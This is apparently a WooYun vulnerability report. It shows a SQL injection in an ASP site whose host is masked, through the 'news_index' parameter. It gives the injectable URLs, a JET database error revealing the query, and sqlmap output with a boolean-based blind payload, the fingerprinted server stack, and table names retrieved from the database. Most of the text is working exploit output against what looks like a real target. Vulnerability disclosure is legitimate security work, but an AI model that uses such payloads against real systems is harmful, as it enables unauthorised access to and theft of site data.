WooYun.org

http://**.**.**.**/news01.asp?news_index=74

http://**.**.**.**/product02.asp?sonclass=140

Microsoft JET Database Engine 錯誤 '80040e14'
查詢運算式 'news_index=74?' 中的 語法錯誤 (少了運算元)。
/inc/zFunDBConnect.asp, 列36

Place: GET
Parameter: news_index
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_index=74 AND 1701=1701
---
[12:44:24] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

[12:44:28] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[12:44:29] [WARNING] running in a single-thread mode. This could take a while.
[12:44:43] [INFO] retrieved: product
[12:45:07] [INFO] retrieved: news
[12:46:14] [INFO] retrieved: company
[12:58:30] [INFO] tried 1866/3167 items (59%)
[12:58:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[13:02:25] [INFO] tried 2262/3167 items (71%)
[13:02:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[13:07:49] [INFO] tried 2807/3167 items (89%)
[13:08:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[13:08:26] [INFO] tried 2829/3167 items (89%)